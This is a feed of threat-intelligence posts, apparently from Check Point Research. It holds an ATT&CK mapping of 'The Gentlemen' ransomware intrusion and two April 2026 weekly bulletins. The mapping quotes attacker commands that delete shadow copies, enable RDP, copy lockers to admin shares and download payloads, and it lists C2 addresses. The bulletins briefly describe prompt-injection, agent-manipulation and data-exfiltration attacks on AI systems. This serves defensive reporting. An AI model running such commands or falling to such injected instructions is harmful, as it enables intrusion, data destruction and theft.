Lateral MovementScheduled Task/Job: Scheduled Task (T1053.005)Remote scheduled tasks (DefUDefSUpdateGU*UpdateGS*) created on numerous hosts and executed with /S <target> and /Run.
Lateral MovementLateral Tool Transfer (T1570)Locker copied using xcopy "<exe>" "\\\\<target>\\C$\\Temp\\" /Y /I /C /H /R /K and accessible via \\\\<host>\\share$\\<exe> from remote systems.
Lateral MovementRemote Services: RDP (T1021.001)RDP access enabled via reg add ...\\Terminal Server /v fDenyTSConnections /d 0 /f and firewall rule enabling “Remote Desktop” group, supporting interactive lateral movement.
Lateral MovementIngress Tool Transfer (T1105)Internal HTTP server on DC offers grand.exe on port 8080, fetched via PowerShell downloadfile(...) to c:\\programdata\\r.exe.
Command and ControlProxy: Multi‑hop Proxy (T1090.003)SystemBC (socks.exe) deployed; attempts outbound C2 to 45.86.230[.]112; acts as encrypted SOCKS proxy for C2 tunneling and pivoting.
Command and ControlIngress Tool Transfer (T1105)Cobalt Strike payloads and ransomware components transferred via HTTP, SMB (ADMIN$C$), and NETLOGON share as part of C2 and staging.
Command and ControlApplication Layer Protocol: Web Protocols (T1071.001)Cobalt Strike beacon from rundll32.exe to 91.107.247[.]163 using ports 443 and later 80 (HTTPS/HTTP).
Command and ControlEncrypted Channel: Asymmetric Cryptography (T1573.002)Cobalt Strike uses encrypted HTTPS; SystemBC uses RC4‑encrypted tunnel over SOCKS; both provide encrypted C2 channels.
ExfiltrationExfiltration Over C2 Channel (T1041)Ransom note claims “We have exfiltrated all your confidential and business data (including NAS, clouds, etc.)”; details not shown, but implies data exfiltration via C2/remote access tooling (Cobalt Strike, SystemBC, AnyDesk).
Impact (Extortion)Data Destruction in Extortion (T1654)Threats of “irreversible wipe of all data and your network” if victim attempts restoration or refuses to negotiate, coupled with timed leak‑site publication.
Impact (Extortion)Financial Theft / Extortion (T1657)Classic double‑extortion: demands payment for decryption and to prevent public leak; uses Tox IDs, Session, Tor blog tezwsse5czllksjb7cwp65rvnk4oobmzti2znn42i43bjdfd2prqqkad.onion, and X account TheGentlemen25.
ImpactData Encrypted for Impact (T1486)Multi‑OS lockers encrypt data (Windows/Linux/ESXi); for large files only 1–9% (depending on --fast/--superfast/--ultrafast) is encrypted with XChaCha20; per‑file footer includes --eph--<base64>--marker--GENTLEMEN\\nGENTLEMEN[...]--.
ImpactInhibit System Recovery (T1490)Shadow copies removed via vssadmin delete shadows /all /quiet and wmic shadowcopy delete$Recycle.Bin removed; logs and prefetch deleted; optional --wipe mode overwrites free space with wipefile.tmp.
ImpactService Stop (T1489)Services (including firewall mpssvc and likely AV/backup) stopped and disabled via sc stop <service> and sc config <service> start=disabled.
ImpactDefacement: Internal Defacement (T1491.001)Desktop background changed to embedded gentlemen.bmp written to %TEMP% and applied via SystemParametersInfoW, signaling compromise to victims.

The post DFIR Report – The Gentlemen & SystemBC: A Sneak Peek Behind the Proxy appeared first on Check Point Research.

13th April – Threat Intelligence Report

By: urias
13 April 2026 at 15:11

For the latest discoveries in cyber research for the week of 13th April, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • The Los Angeles Police Department has reported a data breach involving a digital storage system used by the L.A. City Attorney’s Office. The exposure included 7.7 terabytes and more than 337,000 files, including personnel records, internal affairs material, and unredacted personal information.
  • ChipSoft, a Dutch healthcare software vendor whose HiX platform is used by hospitals across the Netherlands, has suffered a ransomware attack that forced it to disable patient and provider services. Multiple hospitals disconnected from its systems, disrupting operations, and the company warned that the threat actor may have gained unauthorized access to patient data.
  • Ransomware group Qilin has taken responsibility for a cyber-attack targeting German political party Die Linke, which forced the party to shut down its IT infrastructure in late March. The party said membership databases were unaffected, while Qilin threatens to leak stolen sensitive employee and party information.

Check Point Endpoint and Threat Emulation provide protection against these threats (Ransomware.Wins.Qilin*)

  • Bitcoin Depot, a US cryptocurrency ATM operator with more than 25,000 kiosks and checkout locations, has disclosed a cyberattack that allowed attackers to steal credentials tied to digital asset settlement accounts. The attackers transferred more than 50 BTC worth more than $3.6M from company-controlled wallets before access was blocked.

AI THREATS

  • Researchers identified GrafanaGhost, an attack against Grafana’s AI components that can silently exfiltrate enterprise data by chaining indirect prompt injection with image URL validation bypass. The technique can expose financial, infrastructure, and customer information in the background, and Grafana has already addressed the weakness.
  • Researchers outlined AI Agent Traps, a framework describing six web-based attack classes that can manipulate autonomous AI agents through malicious content. The methods can inject hidden instructions, poison reasoning, corrupt memory, and steer tool use, showing how web pages can turn agent workflows into attack surfaces.
  • Researchers measured a growing AI supply chain risk, finding that third-party API routers for AI models can hijack agent tool calls to alter commands and steal credentials. In testing, several routers injected malicious code, abused intercepted cloud keys, and even triggered wallet theft from a researcher environment.

VULNERABILITIES AND PATCHES

  • CISA warns of active exploitation of Ivanti CVE-2026-1340, a critical code injection flaw in Endpoint Manager Mobile that allows unauthenticated remote code execution and full compromise of affected servers. The vulnerability carries a CVSS score of 9.8, affects multiple 12.5 through 12.7 releases, and has been exploited in the wild.

Check Point IPS provides protection against this threat (Ivanti Endpoint Manager Mobile Code Injection (CVE-2026-1340))

  • Adobe Reader is affected by an actively exploited zero-day that uses malicious PDF files to invoke privileged features on fully updated systems, enabling local data theft. Researchers said the activity has run since at least December 2025, uses Russian-language oil and gas lures, and may also enable further compromise.
  • Marimo maintainers released a fix for CVE-2026-39987, a critical remote code execution flaw in the Marimo Python notebook that allowed attackers to open a terminal without authentication and run commands. Exploitation was observed within hours of disclosure against internet-exposed instances, and fixes are available in version 0.23.0.
  • Fortinet has fixed CVE-2026-35616, a critical improper access control flaw in FortiClient EMS that enables unauthenticated code or command execution through crafted requests. The issue been actively exploited in the wild, prompting Fortinet to release an emergency hotfix.

THREAT INTELLIGENCE REPORTS

  • Check Point Research have analyzed March 2026’s threat landscape, with organizations averaging 1,995 weekly attacks. Education remained the most targeted sector, ransomware rose to 672 incidents led by Qilin, Akira, and DragonForce, and GenAI exposure remained high across enterprise environments.
  • Researchers discovered a coordinated software supply chain campaign that planted 36 malicious npm packages impersonating Strapi plugins. The packages executed on installation to search for secrets, maintain command and control, and in some cases enable Redis remote code execution, credential harvesting, and direct PostgreSQL exploitation.
  • Researchers linked Storm-1175, a financially motivated group associated with Medusa ransomware, to high-velocity exploitation of n-day and zero-day flaws. Microsoft said the actor moves quickly from initial access to data theft and ransomware deployment, sometimes weaponizing vulnerabilities within a day and heavily impacting healthcare, education, finance, and services.
  • Researchers identified a hack-for-hire campaign linked to BITTER APT that targeted journalists, activists, and government figures across the Middle East and North Africa. The operators used phishing to access iCloud backups and Signal accounts, and deployed Android spyware disguised as messaging applications to take over victim devices.

The post 13th April – Threat Intelligence Report appeared first on Check Point Research.

6th April – Threat Intelligence Report

By: urias
6 April 2026 at 13:21

For the latest discoveries in cyber research for the week of 30th March, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • The European Commission, the European Union’s executive body, has confirmed a data breach after its Europa.eu platform was compromised through a third-party exchange linked to the Trivy supply chain attack. The incident affected at least one Amazon Web Services account and resulted in data theft, while websites and internal systems remained operational.
  • Global toys and games manufacturing giant Hasbro has disclosed a cyberattack after detecting unauthorized access to its network on March 28. Some systems were taken offline, and the company warned that recovery could take weeks and cause delays.
  • Cryptocurrency trading platform Drift Protocol on Solana has suffered a major breach after an attacker gained enough Security Council approvals to execute pre-signed transactions on April 1. Drift said roughly $280 million was affected, froze platform activity, and stated the incident did not involve a smart contract flaw or seed phrase compromise.
  • Luxury camping providers Roan and Eurocamp have experienced a data breach that exposed guest names, email addresses, phone numbers, travel destinations, booking dates, and prices. Attackers are using the stolen data in WhatsApp payment scams, while the companies said the flaw was patched and no passwords or payment data were taken.

AI THREATS

  • Check Point Research demonstrated a hidden outbound channel in ChatGPT’s execution runtime that enabled silent exfiltration of user data. A single malicious prompt or a backdoored GPT could transmit chat content and uploaded files to attackers through DNS.
  • Check Point warns that based on leaked details about Anthropic’s Claude “Mythos”, the model will likely accelerate vulnerability discovery, exploit development, and multi-step attack automation. The new capabilities could sharply reduce time to exploit and make advanced offensive techniques more broadly accessible.
  • Researchers examined six AI agents and found that impersonation and fabricated urgency can push them to disclose data or take harmful actions. In testing, an agent forwarded 124 emails containing personal and financial details, while others deleted files and reassigned admin access.
  • Researchers observed a flaw in Google Cloud’s Vertex AI Agent Engine that could let attackers extract service agent credentials and pivot into customer projects. The exposed privileges enabled access to storage and Artifact Registry resources, and permissive OAuth scopes also increased the risk of wider Google Workspace exposure.

VULNERABILITIES AND PATCHES

  • Cisco released urgent fixes for CVE-2026-20093, a critical authentication bypass in its Integrated Management Controller software used across ENCS 5000, Catalyst 8300 uCPE, and UCS C-Series M5 and M6 servers. Remote attackers can reset any account, including Admin, allowing full device takeover.
  • Researchers discovered CVE-2026-5281, a zero-day memory flaw in Chrome’s WebGPU component, Dawn, that also impacts Edge, Brave, Opera, and other Chromium-based browsers. The vulnerability is being actively exploited and can enable code execution on user systems, prompting inclusion in CISA’s Known Exploited Vulnerabilities catalog.
  • Progress has addressed two critical ShareFile vulnerabilities, including CVE-2026-2699 with a CVSS score of 9.8, that can be chained for unauthenticated remote code execution. The flaws let attackers reach restricted configuration pages and upload arbitrary files to the server without logging in to affected installations.
  • F5 reclassified CVE-2025-53521, a BIG-IP Access Policy Manager vulnerability, as a critical remote code execution flaw under active exploitation. More than 14,000 internet-exposed systems were still visible online, and the company published indicators of compromise and rebuild guidance for affected devices.

THREAT INTELLIGENCE REPORTS

  • Check Point Research has unmasked TrueChaos, a campaign exploiting a 0-day vulnerability (CVE-2026-3502) in TrueConf’s on-premises update process to push malicious updates to Southeast Asian government networks. Attackers delivered Havoc payloads through trusted servers, and the activity was assessed with moderate confidence as being affiliated with a Chinese nexus.
  • Check Point Research have outlined an Iran-nexus password-spraying campaign against Microsoft 365 in the Middle East, conducted in three waves during March. The activity focused on Israel and the UAE, targeting municipalities and using Tor and VPN infrastructure to evade geofencing and complicate attribution.
  • Check Point Research have uncovered coordinated tax-season phishing and malware activity, with hundreds of newly registered tax-themed domains and rising risk levels. In March 2026, one in ten new domains was flagged as risky, while IRS-impersonating sites harvested personal data and Spain-themed emails delivered malware loaders.
  • Researchers documented a supply chain compromise of the Axios npm package, a widely used HTTP client with millions of monthly downloads, that briefly pushed malicious releases delivering a remote access trojan. The tampered versions used a hidden dependency to fetch a second-stage payload and erase traces after installation.

The post 6th April – Threat Intelligence Report appeared first on Check Point Research.

❌